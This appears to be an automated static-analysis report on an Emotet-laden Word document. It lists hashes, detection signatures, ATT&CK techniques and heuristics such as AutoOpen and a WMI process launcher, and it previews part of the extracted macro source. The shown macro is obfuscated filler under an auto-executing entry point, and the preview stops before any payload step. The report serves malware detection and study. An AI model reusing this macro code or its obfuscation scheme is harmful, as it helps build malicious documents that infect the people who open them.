Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0e99a130a3cbab12…

MALICIOUS

Office (OLE)

214.1 KB Created: 2019-04-15 14:09:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: b20156d4e7bc2a9029c0851e2d63f0e6 SHA-1: 2bfc55c4cad0c1a5f91e2d82156b310c95c7d207 SHA-256: 0e99a130a3cbab12252d1553438683c3605a0d0a15e3e92ad11b0a124e47e57e
282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of auto-executing VBA macros, including the use of GetObject and WMI to launch processes. The VBA script, although obfuscated, likely facilitates the execution of a secondary payload, consistent with Emotet's behavior.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6942082-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6942082-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58751 bytes
SHA-256: 8b3522cb1f68e76b7a0e6253bcbcb08fe8f393f124c27a6178817d811899605a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EkAAXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mUCAZ1XB"
Attribute VB_Base = "0{16694029-35A0-43A6-BEE3-457F589E2D4D}{E88BC16E-5E4C-4D83-96B7-90DCF78AE2F1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AAZCUAcB"
Attribute VB_Base = "0{E810495C-D7FB-4977-A1D0-8839E2FD276F}{0D3C42FA-78CA-48FB-8817-B8244188C7CC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zxAowA"
Sub autoopen()
   If lAG4CQ = sQwUZD Then
      Select Case GAGQcQ
         Case 508762488
            GUAAABxA = 190419696
            OkAZUo1o = cXAcQACA
            m1UBAxAC = Asc(981736341 + Log(196187721 - Rnd(VABxwX)) / 844240778 + Oct(111019734))
         Case 464814719
            wBZXAA = PAcwxU
            j4DAAAA = IQGQ1x
            GAAQBw = CDate(782858085 - Cos(318379711 * Rnd(129490134) + 967422270 * 246634435) * r4AAAZDA / Round(111910574))
         Case 337835668
            EoUc1cAZ = iUABU4BA
            SAAAUAkZ = CStr(398077495)
            UCAAAU = Atn(320148561 + Atn(843031471) * wACCQB * CDate(ZAXGAU + 36 + M4wBQDU / CStr(oDDDXA)))
      End Select
End If
   If DZAXAAAQ = z_XoAZ Then
      Select Case YCwoXBB
         Case 664392449
            QoUAkA = 662748381
            GAXQDDUw = Zc_ZQXQ4
            f4cXwX = Asc(605882810 + Log(343895722 - Rnd(BwAAAA1)) / 184685101 + Oct(863003627))
         Case 771304559
            iQADBUX = d_4AZAc
            ZAAQBA = iDADAAQx
            HkDwAB = CDate(783288910 - Cos(468116216 * Rnd(762989119) + 301119723 * 358753013) * OAU1UAkC / Round(789281521))
         Case 12820256
            qAwAADAQ = WQAABAUZ
            J_AAxAA = CStr(849245303)
            SDDADA = Atn(566204897 + Atn(644556852) * FoAAXA * CDate(iDB1wZ4A + 36 + pAAUGBZ / CStr(sBQXAQB)))
      End Select
End If
UwB1UQwC
   If ICCUAQ = fQUCADA Then
      Select Case LkA4BUBA
         Case 522038515
            N_QDAQ = 777522849
            zAAAAAQ = fBQGXAU
            iQDAAxAA = Asc(142665408 + Log(14718154 - Rnd(ZBAQAD)) / 465370682 + Oct(763059741))
         Case 337443544
            TBAUQBAD = DXo_AoA
            JQ_AkAoA = MQDAGAw
            ZAoGUA = CDate(422122986 - Cos(391451164 * Rnd(40320197) + 37931278 * 904644653) * mUAAABQA / Round(665083796))
         Case 413879902
            UoUBXAGZ = KABA_UB
            XAUQCA = CStr(354284327)
            doAACGc = Atn(905138106 + Atn(700593001) * OwGQwXA_ * CDate(F4A1_B + 36 + nBACAC / CStr(tDXABcAc)))
      End Select
End If
   If DAk4ACDx = OAo1CAD Then
      Select Case OxAZQAA
         Case 815241942
            vAAGU_QC = 333925864
            FkBwBCA = XBXUAU
            iUUA1DAG = Asc(122091247 + Log(777434450 - Rnd(UCQ_kXAA)) / 275770160 + Oct(952271384))
         Case 961085550
            z_AAQwU = SA_UAx1
            IUAUZDA = pxGAAB
            jXADBQG = CDate(801191006 - Cos(607008848 * Rnd(137599686) + 11020541 * 717538314) * wUZAoAAc / Round(989147099))
         Case 16043676
            uACUoA4A = jD4AcA
            lBoADCAC = CStr(943392658)
            hXAo4o = Atn(498288897 + Atn(868020224) * UkCZAD * CDate(wQDDA1 + 36 + zDcBCG / CStr(mCUwxA_)))
      End Select
End If
   If iDBAAZD = S4DGQAA Then
      Select Case Gc4ABA4
         Case 7646736
            BcAAAGD = 448069444
            tQGQQA4 = mkAAAAQ
            aAA1A__ = Asc(542188858 + Log(630524136 - Rnd(BU4xBU)) / 614627097 + Oct(327344726))
         Case 62855792
            CQAAZQCc = oBA_ABXX
            
... (truncated)